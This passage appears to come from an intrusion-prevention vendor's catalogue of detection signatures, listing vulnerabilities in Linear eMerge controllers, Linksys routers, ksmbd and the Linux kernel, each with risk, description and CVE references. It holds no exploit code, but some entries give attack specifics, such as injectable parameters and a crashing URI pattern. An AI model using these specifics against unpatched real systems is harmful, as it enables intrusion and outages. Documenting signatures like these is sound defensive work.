About this vulnerability: A vulnerability in a Linear eMerge E3-Series Access Controller.
Risk: High
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1552-5242
Platform: Unix; Linux
Software: Linear eMerge
Type: Input Validation
Description: A vulnerability in the Linear eMerge E3-Series Access Controller, versions 1.00-06 and before, which allows remote attackers to execute arbitrary system commands as root user via the "No" and "door" parameters.
Situation: HTTP_CSU-Linear-eMerge-E3-Series-Access-Controller-Command-Injection
References:
CVE-2019-7256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7256
Back to top

Linear-eMerge-E3-Series-OS-Command-Injection-CVE-2024-9441

About this vulnerability: A vulnerability in Linear eMerge
Risk: High
First detected in: sgpkg-ips-1812-5242
Last changed: sgpkg-ips-1812-5242
Platform: Generic
Software: Linear eMerge
Type: Input Validation
Description: A command injection vulnerability in the forgot_password functionality of the Linear eMerge E3 Access Control allows an unauthenticated attacker to execute arbitrary OS commands.
Situation: HTTP_CRL-Linear-eMerge-E3-Series-OS-Command-Injection-CVE-2024-9441
References:
CVE-2024-9441
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9441
Back to top

LinkedIn-Internet-Explorer-Toolbar-IEContextMenu-ActiveX-Control-BOF

About this vulnerability: Buffer overflow vulnerability in LinkedIn Internet Explorer Toolbar
Risk: High
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1555-5242
Platform: Windows
Software: LinkedIn Internet Explorer Toolbar
Type: Buffer Overflow
Description: LinkedIn Internet Explorer Toolbar has a buffer overflow vulnerability. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, to compromise the vulnerable system.
Situation: HTTP_SS-LinkedIn-Internet-Explorer-Toolbar-IEContextMenu-ActiveX-Control-BOF
References:
CVE-2007-3955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3955
BID-25032
http://www.securityfocus.com/bid/25032
OSVDB-37696
http://www.osvdb.org/37696
Back to top

Linksys-Routers-Remode-Code-Execution-Vulnerability

About this vulnerability: Multiple vulnerabilities in Linksys routers
Risk: High
First detected in: sgpkg-ips-658-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Linksys Router
Type: Code Injection
Description: Multiple Linksys Routers (E-Series and possibly other models) are vulnerable to a remote, unauthenticated remote code execution attack. This vulnerability is also called "TheMoon" worm.
Situation: HTTP_CRL-Linksys-Routers-Remote-Code-Execution-Vulnerability
References:
BID-65585
http://www.securityfocus.com/bid/65585
Back to top

Linksys-WAP610N-Unauthenticated-Root-Access

About this vulnerability: A vulnerability in Linksys WAP610N
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Linksys WAP610N
Type: Malfunction
Description: There is an unauthenticated remote textual administration console in Linksys WAP610N wireless access point which allows an attacker to run system commands as root user.
Situation: Generic_CS-Linksys-WAP610N-Unauthenticated-Root-Access
Telnet_CS-Linksys-WAP610N-Unauthenticated-Root-Access
References:
OSVDB-70879
http://www.osvdb.org/70879
Back to top

Linksys-WRH54G-Router-HTTP-Request-Handling-Denial-of-Service

About this vulnerability: A vulnerability in Linksys WRH54G Router
Risk: High
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Linksys WRH54G Router
Type: Malfunction
Description: The HTTP service on the Cisco Linksys WRH54G with firmware 1.01.03 allows remote attackers to cause a denial of service (management interface outage) or possibly execute arbitrary code via a URI that begins with a "/./" sequence, contains many instances of a "front_page" sequence, and ends with a ".asp" sequence.
Situation: HTTP_CSU-Linksys-WRH54G-Router-HTTP-Request-Handling-Denial-of-Service
References:
CVE-2008-2636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2636
OSVDB-46042
http://www.osvdb.org/46042
Back to top

Linksys-WRT110-Remote-Command-Execution

About this vulnerability: A vulnerability in Linksys WRT110 router
Risk: Moderate
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Linksys WRT110 Router
Type: Script Injection
Description: A user with access to administrative interface can execute malicious code in Linksys WRT110 wireless routers.
Situation: HTTP_CRL-Linksys-WRT110-Remote-Command-Execution
References:
CVE-2013-3568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3568
BID-61151
http://www.securityfocus.com/bid/61151
Back to top

Linksys-WRT54-Buffer-Overflow

About this vulnerability: A Linksys WRT54 Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Linksys WRT54
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Linksys WRT54 access point, multiple versions, which allows remote attackers to execute arbitrary code via a long HTTP POST request.
Situation: HTTP_CRL-Linksys-WRT54-Buffer-Overflow
References:
CVE-2005-2799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2799
OSVDB-19389
http://www.osvdb.org/19389
Back to top

Linux-Backdoor-C2-Traffic

About this vulnerability: Linux backdoor C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1138-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Backdoor
Description: Command & control traffic originating from a known Linux backdoor was detected.
Situation: HTTP_CSH-Linux-Backdoor-C2-Traffic
Back to top

Linux-Download-Commands-In-Parameter-Values

About this vulnerability: An attempt to exploit a remote code execution vulnerability detected
Risk: High
First detected in: sgpkg-ips-1607-5242
Last changed: sgpkg-ips-1607-5242
Platform: Generic
Software: Any Software
Type: Input Validation
Description: In the process of infiltration, attackers often need to download and execute malicious code through terminal commands. This fingerprint catches the cases where the commands are injected into GET/POST parameter values.
Situation: HTTP_CRL-Linux-Download-Commands-In-Parameter-Values
Back to top

Linux-Esxiargs-Ransomware

About this vulnerability: A transfer of ESXiArgs ransomware detected
Risk: High
First detected in: sgpkg-ips-1860-5242
Last changed: sgpkg-ips-1860-5242
Platform: Generic
Software: ESXiArgs Ransomware
Type: Backdoor
Description: ESXiArgs ransomware.
Situation: File-Binary_Linux-Esxiargs-Ransomware
Back to top

Linux-Kernel-Cipso-IP-Option-Infinite-Loop-DOS

About this vulnerability: A vulnerability in Linux Kernel Project Kernel
Risk: Moderate
First detected in: sgpkg-ips-1121-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Infinite Loop
Description: An improperly formed packet can cause an infinite loop in old versions of the Linux kernel.
Situation: Generic_UDP-Linux-Kernel-Cipso-IP-Option-Infinite-Loop-DOS
References:
CVE-2018-10938
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10938
Back to top

Linux-Kernel-DCCP-Protocol-Handler-DCCP_Setsockopt_Change-Integer-Overflow

About this vulnerability: A vulnerability in Linux Kernel
Risk: High
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Integer Overflow
Description: There exists an integer overflow vulnerability in the Linux Kernel.
Situation: IPv4_Linux-Kernel-DCCP-Protocol-Handler-DCCP_Setsockopt_Change-Integer-Overflow
References:
CVE-2008-3276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3276
BID-30704
http://www.securityfocus.com/bid/30704
Back to top

Linux-Kernel-ICMP-Packet-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in Linux Kernel
Risk: Moderate
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Malfunction
Description: There exists a denial of service vulnerability in the Linux 2.6 Kernel.
Situation: Generic_UDP-Linux-Kernel-ICMP-Packet-Handling-Denial-Of-Service
References:
CVE-2006-0454
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0454
Back to top

Linux-Kernel-IPv4_pktinfo_prepare-Denial-Of-Service

About this vulnerability: A vulnerability in Linux Kernel Project Kernel
Risk: High
First detected in: sgpkg-ips-872-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Malfunction
Description: There exists a denial-of-service vulnerability in the Linux Kernel.
Situation: Generic_UDP-Linux-Kernel-IPv4_pktinfo_prepare-Denial-Of-Service
References:
CVE-2017-5970
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5970
Back to top

Linux-Kernel-IPv6-Netfilter-Nf_CT_frag6_reasm-Null-Pointer-Dereference-DoS

About this vulnerability: A vulnerability in Linux Kernel Project Linux Kernel
Risk: High
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Malfunction
Description: A denial-of-service vulnerability has been discovered in the Netfilter component of the Linux kernel. The vulnerability is due to a Null-pointer dereference in the code, which reassembles fragmented IPv6 packets. A remote, unauthenticated attacker could use this vulnerability to crash a vulnerable system and deny service to legitimate users.
Situation: IP_Fragment-Size-Zero
References:
CVE-2012-2744
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2744
BID-54367
http://www.securityfocus.com/bid/54367
OSVDB-83665
http://www.osvdb.org/83665
Back to top

Linux-Kernel-IPv6-Over-IPv4-Memory-Leak-Denial-Of-Service

About this vulnerability: A vulnerability in Linux Kernel Project Kernel
Risk: Moderate
First detected in: sgpkg-ips-852-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Resource Starvation
Description: A remote denial of service vulnerability exists in Linux Kernel. A remote attacker can consume all available memory by sending crafted packets.
Situation: IPv4_Linux-Kernel-IPv6-Over-IPv4-Memory-Leak-Denial-Of-Service
References:
CVE-2008-2136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2136
BID-29235
http://www.securityfocus.com/bid/29235
Back to top

Linux-Kernel-iSCSI_Add_Notunderstood_Response-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Linux Kernel Project Kernel
Risk: High
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability has been reported in the Linux Kernel. The vulnerability is in the iscsi_add_notunderstood_response() function in the iscsi_target driver and is due to the way a notunderstood response is created after processing very long keys. A remote, unauthenticated attacker can exploit this vulnerability by sending an overly long key. A successful attack can result in arbitrary code execution with kernel privileges. An unsuccessful attack will cause the kernel to crash resulting in a denial-of-service condition.
Situation: Generic_CS-Linux-Kernel-iSCSI_Add_Notunderstood_Response-Heap-Buffer-Overflow
References:
CVE-2013-2850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2850
OSVDB-93755
http://www.osvdb.org/93755
Back to top

Linux-Kernel-Ksmbd-ACL-Inheritance-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in ksmbd
Risk: High
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Platform: Generic
Software: ksmbd
Type: Input Validation
Description: An out-of-bounds write vulnerability has been reported in Linux Kernel ksmbd. The vulnerability is due to improper message validation when processing the Security Descriptor data. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation of the vulnerability can result in code execution in the context of the kernel.
Situation: SMB-TCP_Linux-Kernel-Ksmbd-ACL-Inheritance-Out-Of-Bounds-Write
References:
CVE-2023-52755
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52755
Back to top

Linux-Kernel-Ksmbd-Compounded-Treeid-Validation-Information-Disclosure

About this vulnerability: A vulnerability in ksmbd
Risk: High
First detected in: sgpkg-ips-1739-5242
Last changed: sgpkg-ips-1739-5242
Platform: Linux
Software: ksmbd
Type: Input Validation
Description: An information disclosure vulnerability has been reported in ksmbd, a part of the Linux Kernel. The vulnerability is due to a failure to validate user-supplied data when handling compounded requests. A remote attacker can exploit the vulnerability by sending crafted packets to the vulnerable target. Successful exploitation of the vulnerability can result in information disclosed.
Situation: SMB-TCP_CHS-Linux-Kernel-Ksmbd-Compounded-Treeid-Validation-Information-Disclosure
References:
CVE-2023-52442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52442
Back to top

Linux-Kernel-Ksmbd-Mech-Token-Out-of-Bounds-Read-Vulnerability

About this vulnerability: A vulnerability in Linux Kernel Project
Risk: High
First detected in: sgpkg-ips-1709-5242
Last changed: sgpkg-ips-1709-5242
Platform: Generic
Software: ksmbd
Type: Malfunction
Description: An information disclosure vulnerability has been reported for Linux Kernel in the ksmbd component. The vulnerability is due to memory access error when handling incoming SMB request. A remote, unauthenticated attacker could exploit the vulnerability by sending a crafted request to the target server. Successfully exploiting the vulnerability could result in information disclosure or denial of service in the context of the kernel.
Situation: SMB-TCP_Linux-Kernel-Ksmbd-Mech-Token-Out-of-Bounds-Read-Vulnerability
References:
CVE-2024-26594
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-26594
Back to top

Linux-Kernel-Ksmbd-Session-Key-Exchange-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in ksmbd
Risk: High
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1718-5242
Platform: Generic
Software: ksmbd
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported for the Linux Kernel's ksmbd component. The vulnerability is due to a failure to validate user-supplied data when handling SMB2_SESSION_SETUP requests. A remote, unauthenticated attacker could exploit the vulnerability by sending a crafted request to the target server. Successfully exploiting the vulnerability could result in remote code execution within the kernel space of the target server.
Situation: SMB-TCP_CHS-Linux-Kernel-Ksmbd-Session-Key-Exchange-Heap-Buffer-Overflow
References:
CVE-2023-52440
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52440
Back to top

Linux-Kernel-Ksmbd-Setinfo-Request-Out-of-Bounds-Read-Information-Disclosure

About this vulnerability: A vulnerability in Linux Kernel Project Kernel
Risk: Moderate
First detected in: sgpkg-ips-1776-5242
Last changed: sgpkg-ips-1776-5242
Platform: Linux
Software: <os>
Type: Malfunction
Description: An out-of-bound read when handling the SetInfo request causes a vulnerability in the ksmbd component of the Linux kernel. A successful exploitation allows an attaker to read the kernel memory of the target system.
Situation: SMB-TCP_CHS-Linux-Kernel-Ksmbd-Setinfo-Request-Out-of-Bounds-Read-Information-Disclosure
Back to top

Linux-Kernel-Ksmbd-SMB2-Logoff-Handling-Null-Pointer-Dereference

About this vulnerability: A vulnerability in ksmbd
Risk: High
First detected in: sgpkg-ips-1665-5242
Last changed: sgpkg-ips-1665-5242
Platform: Linux
Software: ksmbd
Type: Malfunction
Description: A NULL pointer dereference vulnerability has been reported in ksmbd, a part of the Linux Kernel. The vulnerability is due to a failure to clean up SMB sessions when handling SMB2_LOGOFF requests. A remote attacker can exploit the vulnerability by sending crafted packets to the vulnerable target. Successful exploitation of these vulnerabilities can result in denial of service.
Situation: SMB-TCP_CHS-Linux-Kernel-Ksmbd-SMB2-Logoff-Handling-Null-Pointer-Dereference
References:
CVE-2023-32252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32252
Back to top

Linux-Kernel-Ksmbd-SMB2_Negotiate-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in ksmbd, a part of the Linux Kernel.
Risk: High
First detected in: sgpkg-ips-1554-5242
Last changed: sgpkg-ips-1554-5242
Platform: Linux
Software: ksmbd
Type: Resource Starvation
Description: A vulnerability in ksmbd, a part of the Linux Kernel, versions prior to 5.15.61, prior to 5.18.18, and prior to 5.19.2, which allows remote attackers to cause a denial of service condition by sending crafted packets to the vulnerable target, due to a failure to release kernel memory when handling SMB2_NEGOTIATE requests.
Situation: SMB-TCP_Linux-Kernel-Ksmbd-SMB2_Negotiate-Handling-Denial-Of-Service
References:
CVE-2022-47941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47941
Back to top

Linux-Kernel-Ksmbd-SMB2_Query_Info-Handling-Null-Pointer-Dereference

About this vulnerability: A vulnerability in Linux Kernel
Risk: High
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Platform: Linux
Software: ksmbd
Type: Malfunction
Description: A NULL pointer dereference vulnerability has been reported in ksmbd, a part of the Linux Kernel. The vulnerability is due to a failure to validate user-supplied data when handling SMB2_QUERY_INFO requests. A remote attacker can exploit the vulnerability by sending crafted packets to the vulnerable target. Successful exploitation of these vulnerabilities can result in denial of service.
Situation: SMB-TCP_Linux-Kernel-Ksmbd-SMB2_Query_Info-Handling-Null-Pointer-Dereference
References:
CVE-2023-32248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32248
Back to top

Linux-Kernel-Ksmbd-SMB2_Session_Setup-Handling-Memory-Exhaustion

About this vulnerability: A vulnerability in ksmbd
Risk: High
First detected in: sgpkg-ips-1600-5242
Last changed: sgpkg-ips-1600-5242
Platform: Linux
Software: ksmbd
Type: Resource Starvation
Description: A denial of service vulnerability has been reported in ksmbd, a part of the Linux Kernel. The vulnerability is due to a failure to validate user-supplied data when handling SMB2_SESSION_SETUP requests. A remote attacker can exploit the vulnerability by sending crafted packets to the vulnerable target. Successful exploitation of these vulnerabilities can result in denial of service.
Situation: SMB-TCP_Linux-Kernel-Ksmbd-SMB2_Session_Setup-Handling-Memory-Exhaustion
References:
CVE-2023-32247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32247
Back to top

Linux-Kernel-Ksmbd-SMB2_Tree_Connect-Handling-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Linux Kernel
Risk: High
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Platform: Generic
Software: ksmbd
Type: Malfunction
Description: An out-of-bounds read vulnerability has been reported in ksmbd, a part of the Linux Kernel. The vulnerability is due to a failure to validate user-supplied data when handling SMB2_TREE_CONNECT requests. A remote attacker can exploit the vulnerability by sending crafted packets to the vulnerable target. Successful exploitation of these vulnerabilities can result in denial of service.
Situation: SMB-TCP_Linux-Kernel-Ksmbd-SMB2_Tree_Connect-Handling-Out-Of-Bounds-Read
References:
CVE-2022-47938
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47938
Back to top

Linux-Kernel-Ksmbd_Decode_NTLMSSP_Auth_Blob-Integer-Underflow

About this vulnerability: A vulnerability in ksmbd.
Risk: High
First detected in: sgpkg-ips-1557-5242
Last changed: sgpkg-ips-1557-5242
Platform: Linux
Software: ksmbd
Type: Integer Overflow
Description: A vulnerability in Linux Kernel, Linux Kernel Project Linux Kernel 5.15.x, which allows remote attackers to cause a denial of service condition by sending crafted requests to the target server, due to an integer underflow in the ksmbd_decode_ntlmssp_auth_blob function.
Situation: SMB-TCP_Linux-Kernel-Ksmbd_Decode_NTLMSSP_Auth_Blob-Integer-Underflow
References:
CVE-2023-0210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0210
Back to top

Linux-Kernel-Libceph-Messenger_V2-Segment-Length-Signedness-Error

About this vulnerability: A vulnerability in Linux Kernel Project Kernel
Risk: Moderate
First detected in: sgpkg-ips-1652-5242
Last changed: sgpkg-ips-1652-5242
Platform: Linux
Software: <os>
Type: Buffer Overflow
Description: Improper input validation in messenger_V2.c causes a signedness vulnerability in the Linux kernel. A successful exploit allows an attacker to cause a denial of service condition or possibly execute code on the target system.
Situation: Generic_SS-Linux-Kernel-Libceph-Messenger_V2-Segment-Length-Signedness-Error
References:
CVE-2023-44466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44466
Back to top

Linux-Kernel-Netfilter-Iptables-Restore-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Netfilter Core Team iptables
Risk: Moderate
First detected in: sgpkg-ips-1178-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Buffer Overflow
Description: Restoration of iptables rules with long arguments causes a stack-based buffer overflow in iptables. A successful exploit may allow an attacker to execute arbitrary code with the usually high privileges of the affected process.
Situation: File-Text_Linux-Kernel-Netfilter-Iptables-Restore-Stack-Based-Buffer-Overflow
References:
CVE-2019-11360
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11360
Back to top

Linux-Kernel-Netfilter-SCTP-Unknown-Chunk-Types-Denial-Of-Service

About this vulnerability: A vulnerability in Linux Kernel Project Kernel
Risk: High
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Malfunction
Description: There exists a denial of service vulnerability in the Linux Kernel.
Situation: IPv4_SCTP-Unknown-Chunk-Type
References:
CVE-2007-2876
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2876
BID-24376
http://www.securityfocus.com/bid/24376
Back to top

Linux-Kernel-Nfsd-Cap_Mknod-Security-Bypass

About this vulnerability: A vulnerability in Linux Kernel Project Linux
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Malfunction
Description: There is a security bypass vulnerability in the Linux Kernel. The vulnerability is due to an insecure design in Linux kernel when handling the NFS request, MKNOD. By sending a crafted NFS MKNOD request to a target system, a remote attacker can leverage this vulnerability to create a device on a target system. Successful exploitation of this vulnerability can allow a remote attacker to create a device on a target system, allowing for further compromise on the vulnerable system.
Situation: SunRPC_CS-Linux-Kernel-Nfsd-Cap_Mknod-Security-Bypass
References:
BID-34205
http://www.securityfocus.com/bid/34205
Back to top

Linux-Kernel-Nfsd-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in the NFS component of the Linux kernel.
Risk: High
First detected in: sgpkg-ips-1555-5242
Last changed: sgpkg-ips-1555-5242
Platform: Linux
Software: linux NFS utils
Type: Buffer Overflow
Description: A heap-based buffer overflow vulnerability in the NFS component of the Linux kernel, Linux Kernel Project Kernel 6.0.x prior to 6.0.2 and prior to 5.19.17, which allows remote attackers to execute arbitrary code or cause a denial of service condition by sending crafted packets to a vulnerable system, due to missing bounds checks on the size of RPC records received.
Situation: Generic_CS-Linux-Kernel-Nfsd-Heap-Buffer-Overflow
References:
CVE-2022-43945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43945
Back to top

Linux-Kernel-Nfsd-Subsystem-Buffer-Overflow

About this vulnerability: A vulnerability in Linux Kernel Project Kernel
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Buffer Overflow
Description: There is a remote denial of service vulnerability in the Linux Kernel. The vulnerability is due to an implementation flaw which may result in a buffer overflow in the NFS subsystem of the Linux Kernel. By sending Access Control List (ACL) NFS requests to a target host, an attacker may exploit this vulnerability to cause kernel panic, leading to a system wide denial of service condition. Exploiting this vulnerability successfully will cause a kernel panic condition on the target system. The kernel will log a panic message on the system console containing debug information pertaining to the panic condition which includes the call trace, register values and so on. The target host must be restarted to resume its functionality.
Situation: Generic_UDP-Linux-Kernel-Nfsd-Subsystem-Buffer-Overflow
References:
CVE-2008-3915
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3915
BID-31133
http://www.securityfocus.com/bid/31133
Back to top

Linux-Kernel-Nfsv4-Nfsd-Pnfs-Denial-Of-Service

About this vulnerability: A vulnerability in Linux Kernel Project Kernel
Risk: Moderate
First detected in: sgpkg-ips-990-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Input Validation
Description: Improper handling of the pNFS LAYOUTGET and GETDEVICEINFO commands in the Linux kernel NFS server causes a denial of service vulnerability.
Situation: SunRPC_CS-Linux-Kernel-Nfsv4-Nfsd-Pnfs-Denial-Of-Service
References:
CVE-2017-8797
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8797
Back to top

Linux-Kernel-SCTP-Asconf-Chunk-Parameter-Padding-Denial-Of-Service

About this vulnerability: A vulnerability in Linux Kernel
Risk: Moderate
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Red Hat Enterprise Linux
Software: <os>
Type: Input Validation
Description: A denial of service vulnerability has been reported in the SCTP networking module of the Linux kernel. The vulnerability is due to an error while processing crafted ASCONF chunks. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted SCTP packets to a vulnerable system. A successful exploitation will result in a system crash.
Situation: IPv4_Linux-Kernel-SCTP-Asconf-Chunk-Parameter-Padding-Denial-Of-Service
IPv6_Linux-Kernel-SCTP-Asconf-Chunk-Parameter-Padding-Denial-Of-Service
References:
CVE-2014-3673
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3673
BID-70883
http://www.securityfocus.com/bid/70883
OSVDB-113727
http://www.osvdb.org/113727
Back to top

Linux-Kernel-SCTP-Asconf-Init-Null-Pointer-Dereference

About this vulnerability: A vulnerability in Linux Kernel Project Kernel
Risk: Moderate
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Red Hat Enterprise Linux
Software: <os>
Type: Malfunction
Description: A denial of service vulnerability has been reported in the SCTP networking module of the Linux kernel. The vulnerability is due to a NULL pointer dereference while processing malformed INIT chunks. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted SCTP packets to a vulnerable system. A successful attack will result in the denial of service condition.
Situation: IPv4_Linux-Kernel-SCTP-Asconf-Init-Null-Pointer-Dereference
IPv6_Linux-Kernel-SCTP-Asconf-Init-Null-Pointer-Dereference
References:
CVE-2014-7841
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7841
BID-71081
http://www.securityfocus.com/bid/71081
OSVDB-114575
http://www.osvdb.org/114575
Back to top

Linux-Kernel-SCTP-Chunkless-Packet-Denial-Of-Service

About this vulnerability: A vulnerability in Linux Kernel
Risk: High
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Malfunction
Description: There exists a denial of service vulnerability in the Linux Kernel.
Situation: IPv4_Linux-Kernel-SCTP-Chunkless-Packet-Denial-Of-Service
References:
CVE-2006-2934
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2934
BID-18755
http://www.securityfocus.com/bid/18755
Back to top

Linux-Kernel-SCTP-Duplicate-Cookie-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in Linux Kernel Project Kernel
Risk: High
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Malfunction
Description: There exists a denial of service vulnerability in the SCTP network module of the Linux Kernel.
Situation: IPv4_Linux-Kernel-SCTP-Duplicate-Cookie-Handling-Denial-Of-Service
References:
CVE-2013-2206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2206
BID-60715
http://www.securityfocus.com/bid/60715
OSVDB-94456
http://www.osvdb.org/94456
Back to top

Linux-Kernel-SCTP-Fwd-Tsn-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in Linux Kernel Organization Linux Kernel
Risk: High
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the SCTP module of Linux Kernel.
Situation: IPv4_Linux-Kernel-SCTP-Fwd-Tsn-Handling-Buffer-Overflow
References:
CVE-2009-0065
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0065
BID-33113
http://www.securityfocus.com/bid/33113
Back to top

Linux-Kernel-SCTP-Handshake-Cookie-Echo-Chunks-Null-Pointer-Dereference

About this vulnerability: A vulnerability in Linux Kernel Project Kernel
Risk: High
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Malfunction
Description: There exists a denial-of-service vulnerability in the Linux Kernel.
Situation: IPv4_Linux-Kernel-SCTP-Handshake-Cookie-Echo-Chunks-Null-Pointer-Dereference
References:
CVE-2014-0101
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0101
BID-65943
http://www.securityfocus.com/bid/65943
OSVDB-104004
http://www.osvdb.org/104004
Back to top

Linux-Kernel-SCTP-SCTP_sf_Ootb-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Linux Kernel Project Kernel
Risk: High
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Malfunction
Description: There exists an out-of-bounds read vulnerability in the SCTP networking module of the Linux kernel. A remote, unauthenticated attacker can use this to cause a denial of service condition.
Situation: IPv4_Linux-Kernel-SCTP-SCTP_sf_Ootb-Out-Of-Bounds-Read
IPv4_Linux-Kernel-SCTP-SCTP_sf_Ootb-Out-Of-Bounds-Read-2
References:
CVE-2016-9555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9555
Back to top

Linux-Kernel-SCTP-SK_ACK_Backlog-Integer-Underflow

About this vulnerability: A vulnerability in Linux Kernel
Risk: High
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Integer Overflow
Description: There exists an integer underflow vulnerability in the SCTP networking module of the Linux Kernel.
Situation: IPv4_Linux-Kernel-SCTP-SK_ACK_Backlog-Integer-Underflow
IPv6_Linux-Kernel-SCTP-SK_ACK_Backlog-Integer-Underflow
References:
CVE-2014-4667
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667
BID-68224
http://www.securityfocus.com/bid/68224
OSVDB-108473
http://www.osvdb.org/108473
Back to top

Linux-Kernel-SCTP_Process_UNK_Param-Sctpchunkinit-Buffer-Overflow

About this vulnerability: A vulnerability in Linux Kernel Organization Linux Kernel
Risk: High
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Buffer Overflow
Description: There exists a vulnerability in Linux Kernel. A remote attacker can use this to cause a memory overflow resulting in arbitrary code execution.
